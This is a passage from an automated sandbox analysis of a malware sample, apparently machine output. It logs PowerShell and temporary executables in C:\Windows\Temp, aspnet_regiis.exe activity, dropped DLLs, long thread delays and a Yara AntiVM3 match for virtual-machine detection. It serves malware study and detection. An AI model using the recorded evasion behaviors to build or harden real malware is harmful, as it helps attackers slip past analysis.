Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: zbjnkzvo4cc.exe PID: 8012, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

System information queried: FirmwareTableInformation

Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Memory allocated: 26F0000 memory reserve \| memory write watch
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Memory allocated: 2970000 memory reserve \| memory write watch
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Memory allocated: 2790000 memory reserve \| memory write watch
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Memory allocated: 4E70000 memory reserve \| memory write watch
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Memory allocated: 5E70000 memory reserve \| memory write watch
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Memory allocated: 5FA0000 memory reserve \| memory write watch
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Memory allocated: 6FA0000 memory reserve \| memory write watch
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Memory allocated: 7430000 memory reserve \| memory write watch
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Memory allocated: 8430000 memory reserve \| memory write watch
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Memory allocated: 2730000 memory reserve \| memory write watch
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Memory allocated: 2A20000 memory reserve \| memory write watch
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Memory allocated: 2730000 memory reserve \| memory write watch
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Memory allocated: 5010000 memory reserve \| memory write watch
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Memory allocated: 6010000 memory reserve \| memory write watch
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Memory allocated: 6140000 memory reserve \| memory write watch
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Memory allocated: 7140000 memory reserve \| memory write watch
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Memory allocated: 7490000 memory reserve \| memory write watch
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Memory allocated: 8490000 memory reserve \| memory write watch

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6331	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3281	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7613
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2008
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4700	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5076	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4275	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5457	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4297
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3387
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3666
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3355
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3290
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2337
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4801
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1963
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5095
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1668
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5382
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2532

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.dll			Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2676	Thread sleep count: 6331 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3492	Thread sleep count: 3281 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2144	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7428	Thread sleep count: 7613 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7432	Thread sleep count: 2008 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7460	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7592	Thread sleep count: 4700 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7596	Thread sleep count: 5076 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7624	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7744	Thread sleep count: 4275 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7732	Thread sleep count: 5457 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7780	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 8104	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7456	Thread sleep count: 4297 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452	Thread sleep count: 3387 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7500	Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7432	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7640	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5780	Thread sleep count: 3666 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5780	Thread sleep count: 3355 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7852	Thread sleep time: -8301034833169293s >= -30000s
